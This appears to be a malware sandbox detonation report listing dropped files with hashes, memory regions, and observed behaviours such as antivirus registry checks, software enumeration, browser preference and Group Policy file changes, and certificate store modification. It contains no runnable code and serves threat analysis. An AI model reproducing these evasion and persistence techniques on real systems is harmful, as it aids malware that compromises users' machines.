| MD5 | c11030bd1b9b76d5371f5d3e42d7620f |
| SHA1 | 20eac9ec20130b18a07eb883172afcedf39ba350 |
| SHA256 | a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780 |
| SHA512 | 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020 |
C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe
| MD5 | c11030bd1b9b76d5371f5d3e42d7620f |
| SHA1 | 20eac9ec20130b18a07eb883172afcedf39ba350 |
| SHA256 | a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780 |
| SHA512 | 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020 |
C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp
| MD5 | e3dcae5ee7ee62e603d2a37128861468 |
| SHA1 | c68f71703f544ec31d1670c09a597c06c827fb46 |
| SHA256 | b1aa9fab8bd7c68246c60587cda7709166be3c1af95e17eeda73722ad08c0e8d |
| SHA512 | f21cd0348762fd711c8de4cf56c98f7d9517856ed1f4f00f9ce62740bd26ee64943f5752132b459476dfa05a777fa2f5f5a5bd4dbfff0456a13b059642fe4d1c |
C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp
| MD5 | e3dcae5ee7ee62e603d2a37128861468 |
| SHA1 | c68f71703f544ec31d1670c09a597c06c827fb46 |
| SHA256 | b1aa9fab8bd7c68246c60587cda7709166be3c1af95e17eeda73722ad08c0e8d |
| SHA512 | f21cd0348762fd711c8de4cf56c98f7d9517856ed1f4f00f9ce62740bd26ee64943f5752132b459476dfa05a777fa2f5f5a5bd4dbfff0456a13b059642fe4d1c |
memory/4384-203-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe
| MD5 | 16ad463bc69dc5e2580ddc855b9f10b0 |
| SHA1 | 2639d11cece15244c647964f3b515cc7b3d429f0 |
| SHA256 | a6c691a303ca0876e2841587979c48a6d54e65f287264a9ac857efbd2720100e |
| SHA512 | d6141e0ce5e4b30855472e740d1ec8cc577e6766b2e2eb1ce9b9a8eeef89456e62bf9603339c13cfe46a004dc1a35bf2bb47ea74849de82613f2f5bb1d16bb5e |
C:\Users\Admin\AppData\Local\Temp\is-ADION.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/4296-208-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4520-206-0x0000000036320000-0x0000000037320000-memory.dmp
memory/4520-196-0x0000000000000000-mapping.dmp
memory/1116-210-0x0000000005630000-0x000000000566C000-memory.dmp
memory/4196-213-0x0000000000000000-mapping.dmp
memory/912-212-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\ScanRename\ScanRename.exe
| MD5 | 21d5953226e85aacd484598f2e5107e6 |
| SHA1 | f6b043191ba9cdf8211740e7638c1dc592a4e393 |
| SHA256 | 689e374732a99e7c78df62c317da2950bb16021988ddaea96fad4f4aaf944748 |
| SHA512 | 6b7ec0dc92c6fb3ca05c8ffe3c077ac1eff10daa7c77a5ac19cafc5a1f96f30e9ad6f4b0a3816160a7369ae8745e4e024d7b40248c450ed8afa24fac461c662f |
C:\Program Files (x86)\ScanRename\ScanRename.exe
| MD5 | 21d5953226e85aacd484598f2e5107e6 |
| SHA1 | f6b043191ba9cdf8211740e7638c1dc592a4e393 |
| SHA256 | 689e374732a99e7c78df62c317da2950bb16021988ddaea96fad4f4aaf944748 |
| SHA512 | 6b7ec0dc92c6fb3ca05c8ffe3c077ac1eff10daa7c77a5ac19cafc5a1f96f30e9ad6f4b0a3816160a7369ae8745e4e024d7b40248c450ed8afa24fac461c662f |
memory/4196-216-0x0000000000400000-0x00000000013C7000-memory.dmp
memory/4196-217-0x0000000000400000-0x00000000013C7000-memory.dmp
memory/2016-218-0x0000000000000000-mapping.dmp
memory/1776-219-0x0000000000000000-mapping.dmp
memory/3212-220-0x0000000000000000-mapping.dmp
memory/2752-221-0x0000000000000000-mapping.dmp
memory/4432-222-0x0000000000000000-mapping.dmp
memory/540-223-0x0000000000000000-mapping.dmp
memory/1592-224-0x0000000000000000-mapping.dmp
memory/1864-225-0x0000000000000000-mapping.dmp
memory/2700-226-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe
| MD5 | 7731cf5b42c4e5a7bf5859240bbcabd9 |
| SHA1 | 881ecf093dd8241b664cfc7521a9351dc8d9cf7c |
| SHA256 | a3f18ccd375dc30af943b517597e4e7f7ed668aa6f711b807891d7225d11bd10 |
| SHA512 | cc1b3a89706660d4fa616243facfd682456a0e875d82d1ac62b8805f35bde672463e89fad0ffe77bbe915884e2e24511de9688b74097551e1e9b54d421fe3281 |
memory/4196-228-0x0000000000400000-0x00000000013C7000-memory.dmp
memory/824-227-0x0000000000000000-mapping.dmp
memory/4296-231-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1352-230-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe
| MD5 | 7731cf5b42c4e5a7bf5859240bbcabd9 |
| SHA1 | 881ecf093dd8241b664cfc7521a9351dc8d9cf7c |
| SHA256 | a3f18ccd375dc30af943b517597e4e7f7ed668aa6f711b807891d7225d11bd10 |
| SHA512 | cc1b3a89706660d4fa616243facfd682456a0e875d82d1ac62b8805f35bde672463e89fad0ffe77bbe915884e2e24511de9688b74097551e1e9b54d421fe3281 |
C:\Users\Admin\AppData\Local\Temp\nss4BAC.tmp\System.dll
| MD5 | cff85c549d536f651d4fb8387f1976f2 |
| SHA1 | d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e |
| SHA256 | 8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8 |
| SHA512 | 531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88 |
C:\Users\Admin\AppData\Local\Temp\nss4BAC.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
memory/3732-235-0x0000000000000000-mapping.dmp
memory/5096-236-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\nss4BAC.tmp\liteFirewall.dll
| MD5 | 165e1ef5c79475e8c33d19a870e672d4 |
| SHA1 | 965f02bfd103f094ac6b3eef3abe7fdcb8d9e2a5 |
| SHA256 | 9db9c58e44dff2d985dc078fdbb7498dcc66c4cc4eb12f68de6a98a5d665abbd |
| SHA512 | cd10eaf0928e5df048bf0488d9dbfe9442e2e106396a0967462bef440bf0b528cdf3ab06024fb6fdaf9f247e2b7f3ca0cea78afc0ce6943650ef9d6c91fee52a |
memory/828-238-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe
| MD5 | b3dba6728cf861a741a710442088683a |
| SHA1 | bf3a57590117cae01c9911f82c69dbe71e5968db |
| SHA256 | a9ada8996fc6ae710b6b74d1db7f1557cf5e52589872fdc6ed685e1e7e1acfa2 |
| SHA512 | 7dba6cd1c6b24558055be15fbe88e7859487c4e8f07553123bc4089f31615b166321712f79d10ffa970f8c91851e7f07f0e4d0ba06141496c675172ee8a1f6d9 |
C:\Users\Admin\AppData\Local\Temp\nss4BAC.tmp\nsProcess.dll
| MD5 | f0438a894f3a7e01a4aae8d1b5dd0289 |
| SHA1 | b058e3fcfb7b550041da16bf10d8837024c38bf6 |
| SHA256 | 30c6c3dd3cc7fcea6e6081ce821adc7b2888542dae30bf00e881c0a105eb4d11 |
| SHA512 | f91fcea19cbddf8086affcb63fe599dc2b36351fc81ac144f58a80a524043ddeaa3943f36c86ebae45dd82e8faf622ea7b7c9b776e74c54b93df2963cfe66cc7 |
C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe
| MD5 | b3dba6728cf861a741a710442088683a |
| SHA1 | bf3a57590117cae01c9911f82c69dbe71e5968db |
| SHA256 | a9ada8996fc6ae710b6b74d1db7f1557cf5e52589872fdc6ed685e1e7e1acfa2 |
| SHA512 | 7dba6cd1c6b24558055be15fbe88e7859487c4e8f07553123bc4089f31615b166321712f79d10ffa970f8c91851e7f07f0e4d0ba06141496c675172ee8a1f6d9 |
C:\Users\Admin\AppData\Local\Temp\nss4BAC.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\Local\Temp\nss4BAC.tmp\md5dll.dll
| MD5 | 7059f133ea2316b9e7e39094a52a8c34 |
| SHA1 | ee9f1487c8152d8c42fecf2efb8ed1db68395802 |
| SHA256 | 32c3d36f38e7e8a8bafd4a53663203ef24a10431bda16af9e353c7d5d108610f |
| SHA512 | 9115986754a74d3084dd18018e757d3b281a2c2fde48c73b71dba882e13bd9b2ded0e6e7f45dc5b019e6d53d086090ccb06e18e6efeec091f655a128510cbe51 |
memory/828-244-0x0000000000660000-0x00000000006B4000-memory.dmp
memory/828-245-0x00007FFAE29A0000-0x00007FFAE3461000-memory.dmp
C:\Users\Admin\AppData\Roaming\InfoInstall\Newtonsoft.Json.dll
| MD5 | 486015a44a273c6c554a27b3d498365c |
| SHA1 | cb08f5d7240dfcdcd77de754259b36c0d9a2a034 |
| SHA256 | 6a168461c721fd14163751f7839fb8d67483cb5831f1b2b1ab3e96a68b82d384 |
| SHA512 | 1578ed43e815017c269d2a37bb9cdc16d51209bfa6bdb7276ad67cbb39955708826973ac7f48c795e6a1361e7d2a14b14b6cea02ee9ecf396a4b02313aada1d6 |
memory/828-247-0x000000001CD90000-0x000000001CE22000-memory.dmp
C:\Users\Admin\AppData\Roaming\InfoInstall\FileOperation.dll
| MD5 | e5d09907a04a7b97500654d71dd3b110 |
| SHA1 | 445c074d92489b85047434ca6938d583c4ca33e8 |
| SHA256 | 33b35e980bf35baaf23ee36e61ae2a758c6627e83e6ca447e67da85ca1062a94 |
| SHA512 | 0cb70775859769be9a536c78abb8a728f2af554369397c8e252de566c05e15037ab4ee105e692915619799327e75609ee673866a353e3fff3dafb0d1f668ed37 |
memory/828-249-0x00000000026E0000-0x00000000026E8000-memory.dmp
memory/1116-250-0x0000000006E50000-0x00000000073F4000-memory.dmp
memory/828-252-0x000000001C830000-0x000000001C852000-memory.dmp
memory/1116-251-0x00000000069A0000-0x0000000006A32000-memory.dmp
memory/1116-253-0x0000000006A40000-0x0000000006AA6000-memory.dmp
memory/5088-254-0x00007FFAE29A0000-0x00007FFAE3461000-memory.dmp
memory/828-255-0x0000000002730000-0x0000000002738000-memory.dmp
memory/828-256-0x000000001CD30000-0x000000001CD68000-memory.dmp
memory/828-257-0x0000000002740000-0x000000000274E000-memory.dmp
memory/828-258-0x000000001C870000-0x000000001C878000-memory.dmp
memory/1116-259-0x00000000080B0000-0x0000000008272000-memory.dmp
memory/1116-260-0x00000000087B0000-0x0000000008CDC000-memory.dmp
memory/2232-261-0x0000000000000000-mapping.dmp
memory/5088-262-0x00007FFAE29A0000-0x00007FFAE3461000-memory.dmp
memory/3996-263-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe
| MD5 | 3896ef0883ecedca578c79f2af731755 |
| SHA1 | 1131214b3e15078dc9ec9a93c1231557e86d5fea |
| SHA256 | 43f9a5d818bdc3b41e72e9d5b6844c70039cb82a1cba6d34fadbc3adefe7a9ee |
| SHA512 | a3a9728f780740ad9d1a937a111ab72877b8f0c9d5ffaf8b0530f74b4cc4336c2d8df4a331d9e62ba97d88e120949b4b75b97028f6be899c9e8a4bd9c6d668bc |
C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe
| MD5 | 3896ef0883ecedca578c79f2af731755 |
| SHA1 | 1131214b3e15078dc9ec9a93c1231557e86d5fea |
| SHA256 | 43f9a5d818bdc3b41e72e9d5b6844c70039cb82a1cba6d34fadbc3adefe7a9ee |
| SHA512 | a3a9728f780740ad9d1a937a111ab72877b8f0c9d5ffaf8b0530f74b4cc4336c2d8df4a331d9e62ba97d88e120949b4b75b97028f6be899c9e8a4bd9c6d668bc |
memory/2516-266-0x0000000000000000-mapping.dmp
memory/3996-267-0x000000000C1D0000-0x000000000C326000-memory.dmp
memory/828-268-0x00007FFAE29A0000-0x00007FFAE3461000-memory.dmp
memory/3996-269-0x0000000002770000-0x00000000028CB000-memory.dmp
memory/4200-270-0x0000000000000000-mapping.dmp
memory/3996-271-0x000000000C1D0000-0x000000000C326000-memory.dmp
memory/1676-272-0x0000000000000000-mapping.dmp
memory/1952-273-0x0000000000000000-mapping.dmp
memory/1952-274-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1952-276-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1952-278-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2284-280-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\240684218.dll
| MD5 | acf51213c2e0b564c28cf0db859c9e38 |
| SHA1 | 0ec6d956dd0299a8d26bd4671af11c9c3fbe2ca0 |
| SHA256 | 643044a62d07c6725a73bce3ee702ad0c15f0fe332165821c5e7f73937f898b7 |
| SHA512 | 15f30f50afdc2838ebdc4f38199f9857c1b9bc43350588abed404dcaef039698a2533dd5c074d2bfc88448a578c2202c033073592a9c551f7a7e4d263e293eed |
memory/1952-281-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2684-282-0x0000000000000000-mapping.dmp
memory/3408-283-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3408-284-0x0000000000000000-mapping.dmp
memory/3408-285-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3408-286-0x0000000000A05000-0x0000000000A07000-memory.dmp
memory/3408-287-0x0000000000A05000-0x0000000000A07000-memory.dmp
memory/3408-288-0x0000000000880000-0x000000000089D000-memory.dmp
memory/3408-289-0x0000000002580000-0x0000000003580000-memory.dmp
memory/3996-290-0x0000000002770000-0x00000000028CB000-memory.dmp
memory/3996-291-0x000000000C1D0000-0x000000000C326000-memory.dmp
memory/3408-292-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3996-293-0x0000000002770000-0x00000000028CB000-memory.dmp
memory/1952-294-0x0000000000400000-0x000000000041E000-memory.dmp
memory/4056-295-0x0000000000A80000-0x0000000000F15000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe
| MD5 | c11030bd1b9b76d5371f5d3e42d7620f |
| SHA1 | 20eac9ec20130b18a07eb883172afcedf39ba350 |
| SHA256 | a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780 |
| SHA512 | 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020 |
C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe
| MD5 | c11030bd1b9b76d5371f5d3e42d7620f |
| SHA1 | 20eac9ec20130b18a07eb883172afcedf39ba350 |
| SHA256 | a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780 |
| SHA512 | 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020 |
memory/1080-298-0x0000000034730000-0x0000000035730000-memory.dmp
memory/4624-301-0x0000000000000000-mapping.dmp
memory/4624-302-0x00000000017A0000-0x00000000017D6000-memory.dmp
memory/4624-303-0x0000000004200000-0x0000000004828000-memory.dmp
memory/4624-304-0x00000000041D0000-0x00000000041F2000-memory.dmp
memory/4624-305-0x00000000049A0000-0x0000000004A06000-memory.dmp
memory/4624-306-0x00000000050A0000-0x00000000050BE000-memory.dmp
memory/2684-307-0x0000000000000000-mapping.dmp
memory/3052-308-0x0000000000000000-mapping.dmp
memory/4504-309-0x0000000000000000-mapping.dmp
memory/2616-310-0x0000000000000000-mapping.dmp
memory/4720-311-0x0000000000000000-mapping.dmp
memory/1012-312-0x0000000000000000-mapping.dmp
memory/4472-313-0x0000000000000000-mapping.dmp
memory/5112-314-0x0000000000000000-mapping.dmp
memory/3080-315-0x0000000000000000-mapping.dmp
memory/1784-316-0x0000000000000000-mapping.dmp
memory/1808-317-0x0000000000000000-mapping.dmp
memory/632-318-0x0000000000000000-mapping.dmp
memory/4104-319-0x0000000000000000-mapping.dmp
memory/3536-320-0x0000000000000000-mapping.dmp
memory/4280-321-0x0000000000000000-mapping.dmp
memory/1740-322-0x0000000000000000-mapping.dmp
memory/4048-323-0x0000000000000000-mapping.dmp
memory/3456-324-0x0000000000000000-mapping.dmp
memory/3496-325-0x0000000000000000-mapping.dmp
memory/3636-326-0x0000000000000000-mapping.dmp
memory/3560-327-0x0000000000000000-mapping.dmp
memory/4932-328-0x0000000000000000-mapping.dmp
memory/4548-329-0x0000000000000000-mapping.dmp
memory/4336-330-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 33b19d75aa77114216dbc23f43b195e3 |
| SHA1 | 36a6c3975e619e0c5232aa4f5b7dc1fec9525535 |
| SHA256 | b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2 |
| SHA512 | 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3bb0bdb597a1fd127cbaa4f35302c377 |
| SHA1 | 29070fd60ac0ababfecf73c26649eeae8c8f430d |
| SHA256 | 3787ce358aaab53861b94920588489cca71d0dc81a2e3f0dc563ea1f0c243b3b |
| SHA512 | 6a114cc4360bc87c708c476462919acdf7a36084a7348d81042fe9cd48374258ba3969b498b0ca9a9444b53e800344d560ee43ed4a2c9ddeb254a93d41216ec1 |
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8b9a260789a22d72263ef3bb119108c |
| SHA1 | 376a9bd48726f422679f2cd65003442c0b6f6dd5 |
| SHA256 | d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc |
| SHA512 | 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b |
memory/5036-336-0x00007FFAE29A0000-0x00007FFAE3461000-memory.dmp
memory/5036-337-0x00007FFAE29A0000-0x00007FFAE3461000-memory.dmp
C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe
| MD5 | c11030bd1b9b76d5371f5d3e42d7620f |
| SHA1 | 20eac9ec20130b18a07eb883172afcedf39ba350 |
| SHA256 | a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780 |
| SHA512 | 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020 |
C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe
| MD5 | c11030bd1b9b76d5371f5d3e42d7620f |
| SHA1 | 20eac9ec20130b18a07eb883172afcedf39ba350 |
| SHA256 | a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780 |
| SHA512 | 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020 |
memory/4748-340-0x0000000034CC0000-0x0000000035CC0000-memory.dmp
memory/4748-343-0x0000000049890000-0x0000000049915000-memory.dmp
C:\Program Files\Mozilla Firefox\browser\omni.ja
| MD5 | 3569909da198e6681650054ebafa2190 |
| SHA1 | dd4fd1cb0c899b98a2322657b77787ce18f3d7ac |
| SHA256 | cd02424977b06035e2d3f6c6a75c488b11480b135e817bc870589df608b8a112 |
| SHA512 | 571faa39b136aff1f32957f85e6cef34f5f7f26596ab2563f719c7e857e20bbb0aa520d41bc8edd8bc9f835a11c24f5531b2e854c7ad521843390387e8774404 |
memory/4748-348-0x0000000049B60000-0x0000000049BC4000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | cbd67300a1b97005c288550af7942b8f |
| SHA1 | 929592e3fc36c2d18ef541c65d798f1ed4ad558e |
| SHA256 | c6150ebeaca05e32c24d358dfc6e0984324c84b819d57c77107dbc63a40f2e2e |
| SHA512 | 41c06af16fe2340a2d546b252857bbf29a87589f23a2d169462274f557ba73240823daec4eb6fe8aff270d40e20a4658709ecbc4112a1547b577a1012cda2346 |
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
| MD5 | 7b3f9454b5839584f6bbe4ce0638250e |
| SHA1 | 95010293da90d63f1f39c1404373bb313fd32d89 |
| SHA256 | 8a62787f7a8eb7ddac05dadc6254e3c49a254fe10e3bd21f7b229f57b4d2e3af |
| SHA512 | 634239e5f569754b1fb46cd5eaf0b074a6d88ba3678ed96b72fd4c0dd3ab9866a77ad9fbc122a5736bbd89a15337efa6039ec6c43b0be8beac0a6446e8fc64e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | e2221c6301727cd1b2adffe308c15728 |
| SHA1 | 92fb0f132888e9bd32b8d6be5832c8571581618c |
| SHA256 | 7e545868f36b3755c80466719c6d8920179f398136c0f6d99f986f4ace744329 |
| SHA512 | 3f7ee9c5a809487e67e2ed5d8fd2130e5069b59e669abb2cc0ed9537504e6cd745af950e142247b45e78074a67caa855b9194d42ca3a7a16e6b6ce98114e1b5a |
C:\Program Files (x86)\XxxUzwYQU\GnbMyEB.xml
| MD5 | 915c57cdbffb1a77efc21e2e004e6f7e |
| SHA1 | 1f76377a7ed327aaa87f4b4f43f028721e96fb1a |
| SHA256 | 18dd7af08cc8cee0cc79c17e5a411a16878f98d5bfdc676f42370ad27ff5aa00 |
| SHA512 | fa985685aa1e56f779bc0d6b144ad31f770f18252870e5e63243bdef676a212ee8452f60f4a0af4476e7707e77ae90b3f742a7ffbbc8d2d6cf2628383a80231e |
C:\Program Files (x86)\WyuevociGfNU2\LzOYMrW.xml
| MD5 | a34f1550125d7aeff98af080c0472cf6 |
| SHA1 | c467a5d721c78b570606091a393a9b9b66423bfd |
| SHA256 | 197c9900b4e837627a911aa5b6c827ae8b45ac24c711d28325db451128f328a5 |
| SHA512 | 0cc8a40b912c4e0df4db03b10a82d398dc7833d3c0a7de100436e84da59122037bfdd0d7554a40e0adb7a2a8e508a92e903d983c54db0758d8a4a5ba8197a7b0 |
C:\ProgramData\FZMYpcBymcbXiuVB\WUpZOtb.xml
| MD5 | fd1e5f7e6d4ba02f19cd04987e89aaa0 |
| SHA1 | e6aea34f856582af5a07991624a41dceaea84562 |
| SHA256 | d68de4e1fbc953f2aeb34852a1a15e65e858344af1875ea6f2bbf9ca310fa71f |
| SHA512 | e84a9ef02a58510eed0dac3924170cf12fc85b505665d86b15c0ee1d6f19a66bd231e4461e52e0af7cb6990a821afafaedb50c975204f61e8a75056c26d0cdc4 |
C:\Program Files (x86)\OdCkbftzuRPDCLooswR\dsKYSUK.xml
| MD5 | b2407ed7c6a616158688e9b988f13f4b |
| SHA1 | 55b5041b16079e33a68b433304df423deeda71c4 |
| SHA256 | 03f4fb9a1d7025f28fa8cefc0cf7437586b7c3eb26a5f3171a3bac24f1e62c7b |
| SHA512 | 20c99a6dd4a679a99232ade17682270e2522a005c797c4912095b6aaf48301ac8176727e15b1e4d6643f04d8855c293c760b8902ddcf8b0f745eac14268fd3eb |
C:\Program Files (x86)\unWhUoTpcLxwC\CqRtzkA.xml
| MD5 | 2335af0a295e267dfd6912d7d89eb008 |
| SHA1 | 0bdbd0b7cb70a4fc808e9e98be349cd1e5a6b424 |
| SHA256 | 0a9608aa0dc1e97d9b43f14afbfec3f65507cfba5153a571391787b3bcafc537 |
| SHA512 | 0e06c7f5707c28da79012520ce7288a046e56816d0a384aeaa9625132dacacff3fca881382c643310547058d85d903e3fc839c261bb5f59d3910052e5893b281 |
memory/4748-359-0x000000004A670000-0x000000004A6E5000-memory.dmp
memory/4748-362-0x000000004A7B0000-0x000000004A869000-memory.dmp
memory/2444-365-0x0000000010000000-0x0000000011000000-memory.dmp
memory/2444-367-0x0000000010630000-0x0000000011630000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:16
Platform
win10v2004-20221111-en
Max time kernel
84s
Max time network
154s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\setup10298.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\setup10298.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe | N/A |
Loads dropped DLL
Checks for any installed AV software in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\AVG\AV | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV\Dir | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast\Version | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast\Version | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
Checks installed software on the system
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = … | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
